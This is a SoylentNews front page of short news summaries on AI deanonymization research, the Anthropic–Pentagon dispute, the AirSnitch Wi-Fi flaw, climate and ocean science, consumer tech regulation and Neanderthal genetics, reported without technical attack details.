Join our Folding@Home team:
Main F@H site
Our team page
Support us: Subscribe Here
and buy SoylentNews Swag
We always have a place for talented people, visit the Get Involved section on the wiki to see how you can make SoylentNews better.
LLMs can unmask pseudonymous users at scale with surprising accuracy:
Burner accounts on social media sites can increasingly be analyzed to identify the pseudonymous users who post to them using AI in research that has far-reaching consequences for privacy on the Internet, researchers said.
The finding, from a recently published research paper, is based on results of experiments correlating specific individuals with accounts or posts across more than one social media platform. The success rate was far greater than existing classical deanonymization work that relied on humans assembling structured data sets suitable for algorithmic matching or manual work by skilled investigators. Recall—that is, how many users were successfully deanonymized—was as high as 68 percent. Precision—meaning the rate of guesses that correctly identify the user—was up to 90 percent.
The findings have the potential to upend pseudonymity, an imperfect but often sufficient privacy measure used by many people to post queries and participate in sometimes sensitive public discussions while making it hard for others to positively identify the speakers. The ability to cheaply and quickly identify the people behind such obscured accounts opens them up to doxxing, stalking, and the assembly of detailed marketing profiles that track where speakers live, what they do for a living, and other personal information. This pseudonymity measure no longer holds.
"Our findings have significant implications for online privacy," the researchers wrote. "The average online user has long operated under an implicit threat model where they have assumed pseudonymity provides adequate protection because targeted deanonymization would require extensive effort. LLMs invalidate this assumption."
The researchers collected several datasets from public social media sites to test the techniques while preserving the privacy of the speakers. One of them collected posts from Hacker News and LinkedIn profiles and then linked them by using cross-platform references that appeared in user profiles. They then stripped all identifying references from the posts and ran a large language model on them. A second dataset was obtained from a Netflix release of micro-identities, such as individual preferences, recommendations, and transaction records. A 2008 research paper showed the list could identify users and ID their political affiliations and other personal information. The last technique split a single user's Reddit history.
"What we found is that these AI agents can do something that was previously very difficult: starting from free text (like an anonymized interview transcript) they can work their way to the full identity of a person," Simon Lermen, a co-author of the paper, told Ars. "This is a pretty new capability, previous approaches on re-identification generally required structured data, and two datasets with a similar schema that could be linked together."
Unlike those older pseudonymity-stripping methods, Lermen said, AI agents can browse the web and interact with it in many of the same ways humans do. They can use reasoning to match potential individuals. In one experiment, the researchers looked at responses given in a questionnaire Anthropic took about how various people use AI in their daily lives. Using the information taken from answers, the researchers were able to positively identify 7 percent of 125 participants.
While a 7 percent recall is relatively low, it demonstrates the growing capability of AI to identify people based on very general information they gave. "The fact that AI can do this at all is a noteworthy result," Lermen said. "And as AI systems get better, they will likely get better at finding more and more identities." While a 7 percent recall is relatively low, it demonstrates the growing capability of AI to identify people based on very general information they gave. "The fact that AI can do this at all is a noteworthy result," Lermen said. "And as AI systems get better, they will likely get better at finding more and more identities."
In a second experiment, the researchers gathered comments made in 2024 from the r/movies subreddit and at least one of five smaller communities: r/horror, r/MovieSuggestions, r/Letterboxd, r/TrueFilm, and r/MovieDetails. The results showed that the more movies a candidate discussed, the easier it was to identify them. An average of 3.1 percent of users sharing one movie could be identified with a 90 percent precision, and 1.2 percent of them at a 99 percent precision. With five to nine shared movies, 90 percent and 99 percent precision rose to 8.4 percent and 2.5 percent of users, respectively. More than 10 shared movies bumped the percentage to 48.1 percent and 17 percent.
In a third experiment, the researchers took 5,000 users from the Netflix dataset and added another 5,000 "distraction" identities of people not in the results. They then added to the list of 10,000 candidate profiles 5,000 query distractors comprising users who appear only in a query set, with no true match in the candidate pool.
Compared to a classical baseline that mimics the Netflix Prize attack to LLM deanonymization, the latter far outperformed the former.
The researchers wrote:
(a) The precision of classical attacks drops very fast, explaining its low recall. In contrast, the precision of LLM-based attacks decays more gracefully as the attacker makes more guesses. (b) The classical attack almost fails completely even at moderately low precision. In contrast, even the simplest LLM attack (Search) achieves non-trivial recall at low precision, and extending it with Reason and Calibrate steps doubles Recall @99% Precision.
The results show that LLMs, while still prone to false positives and other weaknesses, are quickly outstripping more traditional, resource-intensive methods for identifying users online.
The researchers went on to propose mitigations, including platforms enforcing rate limits on API access to user data, detecting automated scraping, and restricting bulk data exports. LLM providers could also monitor for the misuse of their models in deanonymization attacks and build guardrails that make models refuse deanonymization requests.
Of course, another option is for people to dramatically curb their use of social media, or at a minimum, regularly delete posts after a set time threshold.
If LLMs' success in deanonymizing people improves, the researchers warn, governments could use the techniques to unmask online critics, corporations can assemble customer profiles for "hyper-targeted advertising," and attackers could build profiles of targets at scale to launch highly personalized social engineering scams.
"Recent advances in LLM capabilities have made it clear that there is an urgent need to rethink various aspects of computer security in the wake of LLM-driven offensive cyber capabilities, the researchers warned. "Our work shows that the same is likely true for privacy as well."
Medical journal The Lancet blasts RFK Jr.'s health work as a failure:
The medical journal The Lancet did not pull any punches in a scathing editorial on Robert F. Kennedy Jr, calling the anti-vaccine activist's first year as US Health Secretary "a failure by most measures, especially his own."
The Lancet is one of the world's oldest academic medical journals still in publication and one of the most cited sources of peer-reviewed medical research. But it is also well-known for publishing an infamous study by prominent anti-vaccine activist and disgraced ex-physician Andrew Wakefield, which falsely claimed to find a link between vaccines and autism. The Lancet retracted the study more than a decade later.
Kennedy is among the prominent anti-vaccine activists who continue to embrace the thoroughly debunked claim, along with other dangerous conspiracy theories. The Lancet assailed Kennedy for spreading misinformation as the country's top health official and politicizing health policy at the expense of vulnerable Americans, including children.
"The destruction that Kennedy has wrought in one year might take generations to repair, and there is little hope for US health and science while he remains at the helm," the journal's editorial board wrote in its latest issue.
The journal's board noted that when Kennedy first took the role a year ago, he laid out noble ambitions of "radical transparency" and "gold-standard science." But within days Kennedy appeared to abandon those ideals. He rescinded a 54-year-old policy of soliciting public comments on federal actions, summarily dismissed expert advisors and scientific experts, issued altered health recommendations that run counter to decades of scientific evidence, and shut down programs studying critical health issues, such as air pollution and cancer.
As secretary of the US Department of Health and Human Services, Kennedy oversees the National Institutes of Health, the Food and Drug Administration, and the Centers for Disease Control and Prevention—all of which Kennedy is currently driving into the ground, according to the Lancet. His "politicization at the NIH, FDA, and CDC is imperiling the future of US science and innovation and throttling the public health enterprise that keeps the country safe today," the board wrote.
Kennedy has orchestrated an unprecedented overhaul of the CDC's childhood vaccine recommendations, which has been rejected by more than half of US states. He granted $1.6 million for a vaccine trial in Guinea-Bissau that the World Health Organization called "unethical," comparing it to the shameful Untreated Syphilis Study at Tuskegee. Under Kennedy, HHS has "made a habit of throwing good money after bad science," and elevated "junk science and fringe beliefs," the editorial states. Meanwhile, promising research, including on mRNA technology, and critical disease monitoring, such as of explosive cases of measles and pertussis (whooping-cough), are being abandoned or neglected.
In all, The Lancet joined a chorus of voices in the medical and scientific community calling for Kennedy's resignation and for Congress to hold him accountable.
While the medical journal had no kind words for Kennedy, the feeling is mutual. In the past, Kennedy has assailed top medical journals, including The Lancet, as "corrupt" for being influenced by the pharmaceutical industry—a common attack Kennedy uses against his critics.
Euro News reports on a growing movement against ChatCGPT after its contract with the Pentagon:
An online campaign urging users to quit OpenAI's ChatGPT is gathering momentum after a high-profile standoff between AI company Anthropic and the US Department of Defence.
Known as "QuitGPT", the movement claims that more than 1.5 million people have taken action, either by cancelling subscriptions, sharing boycott messages on social media, or signing up via quitgpt.org.
Last week, Anthropic CEO Dario Amodei said he "cannot in good conscience accede to the Pentagon's request" for unrestricted access to the company's AI systems.
"In a narrow set of cases, we believe AI can undermine, rather than defend, democratic values," Amodei wrote. "Some uses are also simply outside the bounds of what today's technology can safely and reliably do."
Anthropic - which makes the chatbot Claude - is the last major AI firm yet to supply its technology to a new US military internal network.
The company reportedly faced a deadline from the Department of Defence to loosen ethical guardrails or risk losing a $200 million (€167 million) contract awarded last July to "prototype frontier AI capabilities that advance US national security".
In a statement published on its website, QuitGPT says: "On February 27, ChatGPT competitor Anthropic refused to give the Pentagon unrestricted access to its AI for mass surveillance of Americans or producing AI weapons that kill without human oversight."
QuitGPT argues that many users wrongly believe ChatGPT is the only viable AI assistant and is urging people to switch platforms. It recommends what it says are higher-privacy and open-source alternatives such as Confer, Alpine and Lumo, as well as corporate rivals including Gemini from Google and Claude from Anthropic.
Gartner previously projected AI PCs would reach 50% market penetration before the end of the decade, but rising memory prices on premium-tier hardware will also push that milestone back to 2028. AI PCs, of course, require more onboard memory to run local inference workloads, making them especially exposed to DRAM cost increases.
Longer upgrade cycles will follow directly from higher prices, and Gartner says that PC lifetimes will extend by 15% for business buyers and 20% for consumers by the end of 2026, a trend it noted will raise concerns about security vulnerabilities on aging hardware.
For the PC market, demand will increasingly concentrate at the top end, where vendors carry enough margin to absorb component inflation without destroying profitability. Gartner advised vendors to accept unit volume decline rather than cut prices to chase budget buyers. "Overall, device vendors and channels face a critical window in the first half of 2026 to optimize pricing and protect margins before component inflation compresses profitability from the second quarter onwards," Atwal said.
The forecast covers smartphones as well, where shipments are projected to fall 8.4% this year. Gartner estimated basic smartphone buyers will exit the market five times faster than premium buyers in 2026 as rising costs push consumers toward refurbished or second-hand alternatives.
Across Cultures, People Combine Reference Frames to Orient Themselves:
When walking through an unfamiliar city, we might rely on different types of directions. Head east out of the train station, take a left at the stop light, turn at the building with the mural.
To move through complex environments and keep track of where objects are, people use reference points either in relation to their own body (for example, to their left) or based on features of their environment (next to the window, across from the door).
As someone moves around, the body-based references, called egocentric reference frames, may change, whereas the environmental references, allocentric reference frames, stay the same. For instance, a tree on the left when walking in one direction is on the right when walking in the other direction, but the tree is always next to the mailbox.
Different cultures use different reference frames, perhaps as a product of language. Americans, who are thought to prefer body-based references, tend to talk egocentrically.
"We say things like, 'You have some food on your left cheek,'" said Benjamin Pitt, a research fellow at the Institute for Advanced Study in Toulouse, in an interview with the Observer. "We would never say that you have some food on your down-river cheek or on your east cheek, but other cultures do."
Additionally, the physical reality of where we live influences our frames of reference. Rather than looking left and right to cross a street, people growing up in the Amazon rainforest cross rivers by looking upriver to check for hazards.
In the natural world, "There's really no reason or very little reason to keep track of left–right spatial distinctions," said Pitt. "Instead, there's good reasons to keep track of allocentric spatial distinctions. It's all about where things are in the environment, and the environment tends to not be organized with respect to our bodies."
[...] Pitt suspects people use different references for left–right and front–back because keeping track of left–right spatial distinctions is harder.
"We have expressions like, 'No, your other left,'" said Pitt. "Nobody is confusing their front from their back. Nobody's like, 'No, your other front.' It's so completely obvious, which is your front and which is your back."
For those more difficult left–right distinctions, people may abandon body-based references for easier environmental references.
"You can just pick something in the environment that's sitting there staring at you," said Pitt. "You don't have to worry about whether it was on your left or your right because that's too confusing."
But people don't use environment-based references for everything. It seems a combination is best, regardless of where you live.
"If you want to move your body through the world, then you're going to need to integrate these things," Pitt said.
Journal Reference: Pitt, B. (2025). One action, two reference frames: Compound cognitive maps of object location. Psychological Science, 36(11), 862–873. https://doi.org/10.1177/09567976251391172
The Norwegian Consumer Council has published a new report, Breaking Free: Pathways to a fair technological future, about countering big tech's growing abuse of its increasingly concentrated power. The 100-page PDF is accompanied by two cover letters, one in English to various EU/EEA/UK and US institutions, and one in Norwegian to Norwegian authorities. The report starts with the problem of platform decay now known colloquially as enshittification. One change is the demand for action to be taken proactively:
Traditional competition tools are ex-post and focused on the abuse of market dominance by individual companies. The drives of enshittification cannot always be linked to one dominant company's abuse of its dominance. When enforcement relies on established harms rather than potential market disruptions, it will often also be too late – either because the digital market has already been skewed in big tech companies' favor or because big tech can argue that the case is no longer relevant.
The New Competition Tool allows authorities to investigate more general market failures that could potentially lead to future lock-in effects and implement interim measures before any harms have materialised. It gives competition authorities more flexibility when it comes to which services and practices can be investigated, and would allow them to investigate some of the drivers of enshittification, such as lock-in effects. In Norway, Germany and the UK, competition authorities already have such powers. These powers should be extended to other authorities, including to the European Commission.
However, the keys to platform independence, open standards (to include file formats and protocols), only get mentioned in passing. Albeit the goal of open standards, interoperability (whether cooperative or adversarial), does get more coverage.
Via Louis Rossmann Norweigan Government comes out swinging on enshittification (also on Odysee) who discusses the Norwegian Consumer Council's 4-minute hard hitting video on the scope of the problem.
Previously:
(2026) A Post-American, Enshittification-Resistant Internet
(2025) As Internet Enshittification Marches On, Here are Some of the Worst Offenders
(2024) Cory Doctorow Has a Plan to Wipe Away the Enshittification of Tech
(2023) Enshittification Everywhere. Your Car, Your Phone, Your Tractor, Your Computer...
https://www.slashgear.com/2112936/africa-coast-brown-ribbon-scientist-alarm/
When you hear that something strange has appeared in satellite footage, it just sounds immediately ominous. When scientists raised the alarm about a brown belt that's longer than a continent, it definitely seemed alarming. But what exactly is the brown stripe that stretches across the Atlantic Ocean? And more importantly, should we be worried?
Satellites started detecting a brown stripe that stretches from the West African coast to the Gulf of Mexico. The strange object is actually 37.5 million tons of brown seaweed, a species called pelagic sargassum, once only found in the Sargasso Sea.
For the last 15 years, however, it's been spreading into the Atlantic — which is already at its "tipping point." Researchers at the Harbor Branch Oceanographic Institute at Florida Atlantic University have been analyzing four decades of satellite data, which has documented the seaweed's rapid growth in the Atlantic. The phenomenon is now called the Great Sargassum Belt, and it's not only disrupting ocean habitats and destroying beaches — it could be accelerating global warming.
Why is the pelagic sargassum spreading at such an alarming rate? Scientists have been researching this phenomenon since the 1980s and have found that the nitrogen content in the brown seaweed has increased by 55% between 1980 and 2020 — the nitrogen to phosphorus ratio also increased by 50%.
This means that the brown seaweed isn't only getting nutrients from natural ocean upwelling — a process where warm water is pushed off the coastline to allow more cold, nutrient-rich water from the deep ocean to rise to the surface. Due to human activity — like agricultural runoff and wastewater discharge — brown seaweed is getting its nutrients from land.
Pelagic sargassum is transported by ocean currents, especially when the Amazon River floods, into the Atlantic. Instead of dying off away from its safe haven of the Sargasso Sea, the brown seaweed is thriving in this new location thanks to the added nutrients.
Over the past few decades, the rapid increase in thriving brown seaweed in the Atlantic has caused some shocking incidents. "These nutrient-rich waters fueled high biomass events along the Gulf Coast, resulting in mass strandings, costly beach cleanups and even the emergency shutdown of a Florida nuclear power plant in 1991," noted Brian Lapointe, Ph.D., the Lead Author and a Research Professor of Florida Atlantic University's Harmful Algae study.
While the brown seaweed is not harmful as a species — and even acts as a habitat for over 100 species of fish, invertebrates, and turtles — this new brown belt has massively disrupted the ecosystem. Large amounts of sargassum wash ashore and begin to rot, releasing toxic hydrogen sulfide gas as it decomposes. The rotting seaweed damages coral reefs, reduces oxygen around the beach, and emits harmful greenhouse gases that could disrupt climate feedback loops.
Researchers are monitoring the brown belt and warning that humans should reduce nutrient runoff from the shore. If nothing changes, the brown seaweed may create similar phenomena in other regions, meaning more Great Sargassum Belts across the ocean. According to recent satellite footage, there's still time to combat climate change if changes are made.
An interesting analysis:
There is a rush for AI companies to team up with space launch/satellite companies to build data centres in space. TL;DR: It's not going to work.
In the interests of clarity, I am a former NASA engineer/scientist with a PhD in space electronics. I also worked at Google for 10 years, in various parts of the company, including YouTube and the bit of Cloud responsible for deploying AI capacity, so I'm quite well placed to have an opinion here.
The short version: this is an absolutely terrible idea, and really makes zero sense whatsoever. There are multiple reasons for this, but they all amount to saying that the kind of electronics needed to make a datacenter work, particularly a datacenter deploying AI capacity in the form of GPUs and TPUs, is exactly the opposite of what works in space. If you've not worked specifically in this area before, I'll caution against making gut assumptions, because the reality of making space hardware actually function in space is not necessarily intuitively obvious.
[Source]: https://taranis.ie/datacenters-in-space-are-a-terrible-horrible-no-good-idea/
Cleaner ship fuel is reducing lightning in key shipping lanes, KU research shows:
Cuts in sulfur emissions from oceangoing vessels have been tied to a reduction in lightning stroke density along heavily trafficked shipping routes in the Bay of Bengal and the South China Sea, according to new research from the University of Kansas.
Previous studies had found frequent lightning along shipping routes over the Bay of Bengal before a 2020 International Maritime Organization rule capped sulfur in fuel used by oceangoing ships, leading to a roughly 70% drop in sulfate emissions in the Bay of Bengal.
"I think there are two reasons for this," said lead author Qinjian Jin, assistant teaching professor of geography & atmospheric science at KU. "The first is the shipping activity is so frequent that it releases a lot of sulfate aerosols, more than other oceanic regions. The second is that the Bay of Bengal is an area where we see lots of strong convection that is required for lightning to occur. I think both reasons contribute to the observed frequent lightning activity over this region."
Jin said these two ocean regions best revealed the connection between shipping emissions and lightning. The KU researcher and his colleagues found lightning-stroke density — the number of individual lightning discharges, or "strokes," per square kilometer — to be about 36% lower than before the 2020 IMO sulfur cap.
"The drop in sulfates from ships can cause fewer cloud condensation nuclei, larger cloud drops, weaker convection and storms, and thus fewer ice crystals and less frequent lightning," Jin said.
[...] "When we have more sulfate aerosols, or more cloud nuclei, the cloud droplets become smaller," he said. "When they're smaller, it's harder for precipitation to occur. Clouds can last longer in the atmosphere. With a longer lifetime, they have a higher chance to develop into high clouds, where ice clouds form. When we have more ice clouds, we have a higher chance of lightning. That is how sulfate aerosols can be connected to lightning."
While the 2020 regulations on shipping were intended to clean up the air, the reduction in lightning can be seen as a side benefit as it can be dangerous to mariners and equipment as well as hinder visibility and normal operations at sea. Jin said another consequence of the shipping regulation might be warmer global temperatures.
"Due to the 2020 emission regulation imposed by the International Maritime Organization, we observed a decrease in sulfur emissions from ships after 2020," he said. "With less sulfate aerosol emitted from ships, we observed darker clouds over the North Atlantic Ocean and the Pacific Ocean. Because clouds become darker, they absorb more solar radiation. Our previous studies imply that the decrease in shipping sulfate aerosols could be responsible for the record-breaking global warming temperatures in 2023 and 2024."
Journal Reference: Jin, Q., Huang, J., Wei, J. et al. Observational evidence of reduced Bay of Bengal lightning since 2020 linked to cloud responses to shipping emission regulations. npj Clim Atmos Sci 8, 350 (2025). https://doi.org/10.1038/s41612-025-01256-w
MotorTrend reports https://www.motortrend.com/news/kia-plant-solar-power-hail-protection that the Kia assembly plant in Georgia suffered very expensive hail damage to new cars waiting to be shipped, back in a storm in 2023. The fix is a massive raised solar array of 3.2 million square feet (300,000 meters^2) over the car park/storage area.
The system has about 17,000 solar panels on the columns of a structure that is large enough to protect about 15,000 vehicles from the elements until they are loaded onto trucks or rail cars for delivery. Hail damage costs billions of dollars a year.
The panels are not all connected yet. Construction began in 2024 and the goal was to be done in the first quarter of 2026 but panels are still being installed. It should be finished this spring.
VPS [Vehicle Protection Structures] has provided this kind of protection to dealerships, but this is the first large-scale execution for an assembly plant.
The partnership is also working with Georgia Power to optimize energy production and integrate the power generated by the solar panels into the plant. The panels will be capable of supplying 10 percent of the plant's energy needs. The project also provided credits under the U.S. Inflation Reduction Act until that act was terminated.
Pics at the link, sort of like large "pop-up" shelters. To your AC submitter it's quite attractive.
Insuring the solar panels for hail damage seems like it would be cheaper than insurance to cover the same area of cars.
The US military mistakenly shot down a Customs and Border Protection (CBP) drone near the Mexican border in a strike that reportedly used a laser-based anti-drone system. The CBP uses drones to track people crossing the border.
"Congressional aides told Reuters the Pentagon used the high-energy laser system to shoot down a Customs and Border Protection drone near the Mexican border, in an area that often has incursions from Mexican drones used by drug cartels," Reuters reported last night.
[...] "The Defense Department didn't realize the drone was being flown by CBP when it shot it down," and "had not first coordinated the use of the laser system with the US Federal Aviation Administration," Bloomberg wrote, citing anonymous sources.
The military hasn't been coordinating counter-drone measures with the FAA, and "CBP drone operators didn't inform the military's laser unit that it was launching," Bloomberg wrote, citing anonymous sources. Because the CBP didn't notify the Defense Department, the military viewed the aircraft as "an unknown drone," the Times wrote, citing an unnamed Pentagon official.
The latest incident came about two weeks after the FAA abruptly closed airspace over El Paso for a few hours, leading to flight cancellations. In the early February incident, CBP was the one that fired the laser. The CBP was "using the same technology on loan from the military to combat drug-smuggling" and "fired a high-energy laser at what they thought was a drone," but turned out to be a party balloon, the Times wrote.
"In both cases, the lasers were used without the FAA's approval, which many aviation safety experts maintain is a violation of the law," the Times wrote.
[...] The Pentagon, CBP, and FAA confirmed some details of the incident in a joint statement provided to Ars by the Pentagon today. The statement said the "engagement occurred when the Department of War employed counter-unmanned aircraft system authorities to mitigate a seemingly threatening unmanned aerial system operating within military airspace. The engagement took place far away from populated areas and there were no commercial aircraft in the vicinity."
[...] The statement did not mention that the drone was a CBP drone, and the Pentagon declined to provide further details to Ars.
Anthropic cites risks of autonomous military applications, mass domestic surveillance:
President Donald Trump ordered every U.S. federal agency to stop using technology from AI company Anthropic on Friday, February 27, posting the directive to Truth Social at 3:47 PM ET — more than an hour before the Pentagon's own 5:01 PM ET deadline for Anthropic to comply with its demands.
“THE UNITED STATES OF AMERICA WILL NEVER ALLOW A RADICAL LEFT, WOKE COMPANY TO DICTATE HOW OUR GREAT MILITARY FIGHTS AND WINS WARS,” Mr. Trump fumed on Truth Social, adding that he is directing every U.S. federal agency to “IMMEDIATELY CEASE all use of Anthropic's technology.”
[...] After months of private talks collapsed into a public standoff this week, Amodei said Thursday his company "cannot in good conscience accede" to the DoD's terms. The Pentagon responded by threatening to invoke the Korean War-era Defense Production Act to compel Anthropic's compliance and warned it would designate the company a "supply chain risk" — a label typically reserved for companies from adversarial nations such as Huawei.
[...] Claude was the only AI model approved for use in classified military systems, and defense software firm Palantir, which uses Claude to power its most sensitive government contracts, will need to find a replacement quickly. OpenAI CEO Sam Altman said Friday he shares Anthropic's position on autonomous weapons' ethical “red lines,” complicating its candidacy as a direct replacement.
Also see:
• Trump Slams Anthropic as 'Woke,' Orders Feds to Stop Using Claude AI
• Claude won't be allowed to engage in mass surveillance or power fully autonomous weapons
Meanwhile:
OpenAI said it had struck a deal with the Pentagon to supply AI to classified US military networks, hours after Donald Trump ordered the government to stop using the services of one of the company's main competitors.
Sam Altman, OpenAI's CEO, announced the move on Friday night. It came after an agreement between Anthropic, a rival AI company that runs the Claude system, and the Trump administration broke down after Anthropic sought assurances its technology would not be used for mass surveillance – nor for autonomous weapons systems that can kill people without human input.
Announcing the deal, Altman insisted that OpenAI's agreement with the government included assurances that it would not be used to those ends.
[...] If OpenAI's deal does prohibit its systems from being used for unethical ends, it would appear the company has succeeded in receiving assurances where Anthropic could not. Altman announced the deal with the government shortly after the president said he would direct all federal agencies to "IMMEDIATELY CEASE" all use of Anthropic technology.
[...] It remains to be seen how OpenAI staff respond to the government deal. In its battle with the Trump administration, Anthropic has drawn support from its most fierce rivals. Nearly 500 OpenAI and Google employees signed on to an open letter saying "we will not be divided".
"The Pentagon is negotiating with Google and OpenAI to try to get them to agree to what Anthropic has refused," the letter reads. "They're trying to divide each company with fear that the other will give in."
There's a silent vulnerability lurking underneath the architecture of Wi-Fi networks:
A team of researchers from the University of California, Riverside revealed a series of weaknesses in existing Wi-Fi security, allowing them to intercept data on a network infrastructure that they've already connected to, even with client isolation in place.
The group called this vulnerability, AirSnitch, and, according to their paper [PDF], it exploits inherent weaknesses in the networking stack. Since Wi-Fi does not cryptographically link client MAC addresses, Wi-Fi encryption keys, and IP addresses through Layers 1, 2, and 3 of the network stack, an attacker can use this to assume the identity of another device and confuse the network into diverting downlink and uplink traffic through it.
Xin'an Zhou, the lead author on the research, said in an interview, according to Ars Technica, that AirSnitch "breaks worldwide Wi-Fi encryption, and it might have the potential to enable advanced cyberattacks." He also added, "Advanced attacks can build on our primitives to [perform] cookie stealing, DNS and cache poisoning. Our research physically wiretaps the wire altogether so these sophisticated attacks will work. It's really a threat to worldwide network security."
AirSnitch does not break encryption at all, but it challenges the general assumption that encrypted clients cannot attack each other because they've been cryptographically isolated.
[...] The researchers found that these vulnerabilities exist in five popular home routers — Netgear Nighthawk x6 R8000, Tenda RX2 Pro, D-LINK DIR-3040, TP-Link Archer AXE75, and Asus RT-AX57 — two open-source firmwares — DD-WRT v3.0-r44715 and OpenWrt 24.10 — and across two university enterprise networks. This shows that the issue is not just limited to how manufacturers make and program their routers. Instead, it’s a problem with Wi-Fi itself, where its architecture is vulnerable to attackers who know how to take advantage of its flaws.
While this may sound bad, the researchers pointed out that this type of attack is rather complicated, especially with how complicated modern wireless networks have become. Still, that does not mean that manufacturers and standardization groups should ignore this problem. The group hoped that this revelation would force the industry to come together and create a rigorous set of requirements for client isolation and avoid this flaw in the future.
https://www.slashgear.com/2107938/removable-battery-phones-making-comeback/
Many of today's mobile phones, like the slim iPhone Air, are lightweight and sleek, with an advanced design and the latest in modern technology. It's a far cry from previous models, which were bulkier, had buttons, and bulged in your pocket. But while mobile phones have evolved over the years, the current fixed-battery design is reverting to its old form, thanks to legislation from the European Union (EU). Based on these new guidelines, phones will once again need batteries that can be safely removed and replaced by the user.
The EU's legislation also mandates that replacement batteries, while meeting the device's technical specifications, not be bound by proprietary limits. This means that a phone must be able to accept a compatible battery that meets the device's safety and technical standards, whether or not it's manufacturer-branded. Plus, replacement batteries must be available to the user for at least 5 to 7 years following a model's end of production. The EU has placed a date of February 18, 2027, for these expectations to be met.
[...] The EU's new legislation requiring smartphones to have removable batteries accomplishes a few different things. First, allowing users to replace a spent battery with a new one helps extend the life of the device before its final disposal. Plus, it also enables battery repair or replacement without throwing out the entire phone. By giving users this capability, the rules are meant to encourage reuse of existing phones and help cut down on electronic waste.
[...] But if removable batteries become the norm once again, then phone design could take a step backward in terms of overall construction. That's because cases may need to become thicker to accommodate the removable batteries, and additional safety features would need to be added to protect the new design as well. Until the top phone manufacturers reveal newer models to satisfy the EU's standards, it's unclear what changes users can expect to see.
By now, it's firmly established that modern humans and their Neanderthal relatives met and mated as our ancestors expanded out of Africa, resulting in a substantial amount of Neanderthal DNA scattered throughout our genome. Less widely recognized is that some of the Neanderthal genomes we've seen have pieces of modern human DNA as well.
Not every modern human has the same set of Neanderthal DNA, however; different people will, by chance, have inherited different fragments. But there are also some areas, termed "Neanderthal deserts," where none of the Neanderthal DNA seems to have persisted. Notably, the largest Neanderthal desert is the entire X chromosome, raising questions about whether this reflects the evolutionary fitness of genes there or mating preferences.
Now, three researchers at the University of Pennsylvania, Alexander Platt, Daniel N. Harris, and Sarah Tishkoff, have done the converse analysis: examining the X chromosomes of the handful of completed Neanderthal genomes we have. It turns out there's also a strong bias toward modern human sequences there, as well, and the authors interpret that as selective mating, with Neanderthal males showing a strong preference for modern human females and their descendants.
Given how long modern humans and Neanderthals had been evolving as separate populations, some degree of genetic incompatibility is definitely possible. Lots of proteins interact in various ways, and the genes behind these interaction networks will evolve together—a change in one gene will often lead to compensatory changes in other genes in the network. Over time, those changes may mean re-introducing the original gene will actually disrupt the network, with a negative impact on fitness.
That means the introduction of some Neanderthal genes into the modern human genome (or vice versa) would be disruptive and make carriers of them less fit. So they'd be selected against and lost over the ensuing generations. Of course, some segments would likely be lost at random—the genome's pretty big, and the modern human population was likely large and growing, allowing its DNA to dilute out the influence of other human populations. Figuring out which influence is dominant can be challenging.
One way to sort this out is to make the same comparison with Neanderthal genomes. If a Neanderthal gene is disruptive in a modern human context, then it's likely that the modern human version will be disruptive in Neanderthals. And, in fact, that's what we seem to see: A look at one Neanderthal genome found that there's some correlation between the Neanderthal deserts in the human genome and the human deserts in that Neanderthal.
All of that, however, doesn't go far to explain the fact that the X chromosome looks like a giant Neanderthal desert, with long stretches of nothing but modern human DNA. The genetics of the X is complicated by the fact that males inherit a single copy from their mothers, so they have only a single copy of almost every gene on it. If any of those genes are causing problems, they will be quickly selected against in males.
Thus, evolutionary selection against the Neanderthal X is definitely an option. The alternative they consider is that it's the product of biased matings. If most mating between the two groups was biased in some way, it could skew the frequency with which the X chromosome was inherited. For example, if most of the matings involved Neanderthal males and modern human females, then you would have fewer Neanderthal X's around as a result, since only half of a male's offspring will inherit an X chromosome from them.
To figure out which result might be the case, the researchers again turned to the three Neanderthal genomes we have available, looking at the pattern of inheritance along the X chromosome. That was compared to X chromosomes from African populations that have very little Neanderthal DNA.
The results contrasted sharply with what was seen elsewhere in the genome, where Neanderthal deserts in modern humans correspond to human deserts in the Neanderthal genome. Instead, the X chromosome in Neanderthals tended to have an excess of modern human sequences—exactly as you see in modern humans. It appears that the modern human X ended up more common in both human and Neanderthal populations.
Could this be from evolutionary selection for something favorable about it? The researchers found that modern human DNA found on the Neanderthal X had a lower than average frequency of important sequences like those that regulate nearby genes or code for proteins. While that doesn't rule out evolutionary selection as a factor, it does make it seem a bit less likely, since there's less indication that the DNA being kept around is functional.
That leaves preferential mating as a more probable explanation. But the modern human DNA was present at such a high frequency on the X that it's difficult to explain by a simple preference of Neanderthal males for modern human females. Instead, you'd have to have a continued preference for the offspring of these matches as well. "We did not rule out more complicated scenarios combining selection and sex biases, such as natural selection acting as a modifying force on top of the strong signature left by sex bias," the authors also note.
Overall, we're left with a picture of a relatively large number of matings between male Neanderthals and modern human females. The offspring of these matings ended up in both the modern human and Neanderthal populations; in the latter, their offspring were favored enough to have led to an excess contribution to the X chromosome.
Science, 2026. "Interbreeding between Neanderthals and modern humans was strongly sex biased"
DOI: 10.1126/science.aea6774 (Source).